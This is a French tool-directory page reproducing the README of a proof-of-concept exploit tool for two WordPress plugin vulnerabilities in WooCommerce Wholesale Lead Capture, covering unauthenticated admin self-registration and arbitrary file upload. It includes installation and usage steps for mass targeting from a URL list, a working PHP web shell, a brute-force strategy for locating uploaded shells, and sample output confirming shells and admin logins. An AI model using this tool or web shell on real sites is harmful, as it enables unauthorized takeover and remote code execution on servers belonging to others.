Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-27542-CVE-2026-27540- — Privilège non authentifié | Téléversement arbitraire de fichier non authentifié | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

Privilège non authentifié | Téléversement arbitraire de fichier non authentifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
26il y a 4 moisPas encore vérifié

Typing SVG


🔴 Vue d'ensemble des vulnérabilités

CVE-2026-27542 — Élévation de privilèges non authentifiée

Description :
Le plugin WooCommerce Wholesale Lead Capture pour WordPress est vulnérable à une élévation de privilèges non authentifiée dans toutes les versions affectées connues. La vulnérabilité réside dans le gestionnaire d'action AJAX wwlc_create_user, qui traite les demandes d'inscription des utilisateurs sans assainir ni valider correctement les champs de rôle fournis par l'utilisateur. Un attaquant distant non authentifié peut élaborer une requête POST spécialement conçue qui injecte des champs de capacités WordPress arbitraires — y compris wp_capabilities[administrator] — directement dans les métadonnées de l'utilisateur au moment de la création du compte. Cela permet à l'attaquant de s'inscrire lui-même en tant qu'administrateur WordPress sans aucune authentification préalable ni interaction d'un utilisateur légitime, entraînant la compromission totale de l'installation WordPress concernée.


CVE-2026-27540 — Téléversement arbitraire de fichier non authentifié

Description :
Le plugin WooCommerce Wholesale Lead Capture pour WordPress est vulnérable à un téléversement arbitraire de fichier non authentifié dans toutes les versions affectées connues. La vulnérabilité réside dans l'action AJAX wwlc_file_upload_handler, qui est enregistrée sans aucune exigence d'authentification ni de vérification de nonce. En soumettant une requête POST multipart spécialement conçue à /wp-admin/admin-ajax.php, un attaquant distant non authentifié peut téléverser des fichiers de type arbitraire — y compris des shells web PHP — dans le répertoire wp-content/uploads/ du serveur, sous un sous-répertoire wwlc-temp-* généré dynamiquement. Une exploitation réussie conduit à une exécution de code à distance (RCE) sur le serveur web sous-jacent, s'exécutant avec le compte utilisateur du processus web.


🛠️ Description de l'outil

Ceci est un script d'exploitation Proof-of-Concept (PoC) pour les deux vulnérabilités critiques décrites ci-dessus, ciblant les installations WordPress exécutant le plugin WooCommerce Wholesale Lead Capture. L'outil prend en charge deux modes d'attaque indépendants :

ModeType d'attaqueObjectif
Mode 1Téléversement arbitraire de fichier non authentifié + découverte de dossier par force bruteTéléverser un shell web PHP et le localiser via une devination de dossiers multicouche
Mode 2Élévation de privilèges non authentifiée via l'inscriptionS'inscrire soi-même en tant qu'administrateur WordPress et vérifier l'accès administrateur

📋 Prérequis

Prérequis système

  • Python 3.8 ou supérieur
  • Accès Internet à la ou aux cibles
  • Linux / Windows / macOS

Dépendances Python

root@kitploit:~
pip install requests urllib3 colorama

Ou installez via le fichier requirements :

root@kitploit:~
pip install -r requirements.txt

requirements.txt :

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ Utilisation

Exécution de base

root@kitploit:~
python3 CVE-2026-27542_CVE-2026-27540.py

L'outil présente une interface de terminal interactive. Tous les paramètres requis vous seront demandés.


🗂️ Format de la liste des cibles

Créez un fichier texte brut (par exemple list.txt) avec une URL cible par ligne :

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 Mode 1 — Téléversement de fichier + force brute de dossiers

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

Exemple de fichier shell (shell.php) :

root@kitploit:~
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

Remarque : Le dossier wwlc-temp-* est généré dynamiquement par le plugin à l'aide de la fonction PHP uniqid('wwlc-temp-'). L'outil utilise une stratégie de force brute multicouche pour le découvrir :


🟠 Mode 2 — Inscription + injection de rôle + vérification administrateur

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

L'outil :

  1. Découvre le formulaire d'inscription WWLC et extrait un nonce valide
  2. Soumet une charge utile d'inscription spécialement conçue injectant le rôle administrator
  3. Tente de se connecter avec les identifiants créés
  4. Vérifie l'accès au panneau d'administration via plusieurs points de terminaison admin WP
  5. Enregistre les accès administrateur confirmés dans le fichier de sortie

📁 Fichiers de sortie

FichierDescription
scan_results/wwlc_uploads.txt

Exemple de sortie (Mode 2 — Accès administrateur)

root@kitploit:~
[INFO]    Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO]    https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2

Exemple de sortie (Mode 1 — Shell trouvé)

root@kitploit:~
[INFO]    Mode1 | Target: https://target.com
[INFO]    https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO]    https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO]    https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s

📡 Contact et auteur

Par : Nxploited (Khaled Alenazi)

 


⚠️ Avertissement légal

CET OUTIL EST FOURNI UNIQUEMENT À DES FINS ÉDUCATIVES ET DE RECHERCHE EN SÉCURITÉ AUTORISÉE.

L'auteur, Nxploited (Khaled Alenazi), et tous les contributeurs de ce projet n'approuvent pas, ne soutiennent pas et n'assument aucune responsabilité en cas d'utilisation abusive de cet outil ou de tout dommage causé par l'utilisation de ce logiciel contre des systèmes pour lesquels vous ne disposez pas d'une autorisation écrite explicite.

  • ✅ Autorisé : Utilisation sur des systèmes vous appartenant ou pour lesquels vous avez reçu une autorisation écrite explicite de test.
  • ❌ Interdit : Utilisation contre tout système sans autorisation écrite explicite préalable du propriétaire du système.

L'accès non autorisé à des systèmes informatiques est illégal et passible de sanctions en vertu des lois applicables, y compris, mais sans s'y limiter, le Computer Fraud and Abuse Act (CFAA), le Computer Misuse Act (CMA) et les législations équivalentes dans le monde entier.

En utilisant cet outil, vous acceptez l'entière responsabilité de vos actions et confirmez que vous disposez de l'autorité légale pour tester les systèmes ciblés.

L'auteur décline toute responsabilité pour tout dommage direct, indirect, accessoire ou consécutif découlant de l'utilisation ou de la mauvaise utilisation de ce logiciel.


© 2026 Nxploited (Khaled Alenazi) — Uniquement pour la recherche en sécurité autorisée.

Télécharger l’outil
ChampDétails
Identifiant CVECVE-2026-27542
SévéritéCRITIQUE — Score CVSS v3.1 : 9.8
VecteurCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Composant affectéPlugin WooCommerce Wholesale Lead Capture (WWLC) pour WordPress
Type de vulnérabilitéÉlévation de privilèges non authentifiée
Authentification requiseAucune
CWECWE-269 : Gestion inappropriée des privilèges
ChampDétails
Identifiant CVECVE-2026-27540
SévéritéCRITIQUE — Score CVSS v3.1 : 9.8
VecteurCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Composant affectéPlugin WooCommerce Wholesale Lead Capture (WWLC) pour WordPress
Type de vulnérabilitéTéléversement arbitraire de fichier non authentifié (conduisant à une exécution de code à distance)
Authentification requiseAucune
CWECWE-434 : Téléversement sans restriction d'un fichier de type dangereux
CoucheStratégieDescription
0Liste de répertoiresTente de lister le répertoire des téléversements s'il est ouvert
1Basée sur des motifsDevinations numériques basées sur le temps et séquentielles
2Hexadécimal basé sur le tempsInitialisée par les horodatages des requêtes HTTP observées
3Hexadécimal aléatoireDevination de chaînes hexadécimales purement aléatoires
Tous les sites où le téléversement de fichier a réussi (Mode 1)
scan_results/wwlc_shells_found.txtURLs complètes des shells confirmés accessibles (Mode 1)
scan_results/wwlc_register_results.txtTous les résultats des tentatives d'inscription avec identifiants (Mode 2)
scan_results/Admin_login.txtAccès administrateur confirmés avec identifiants (Mode 2)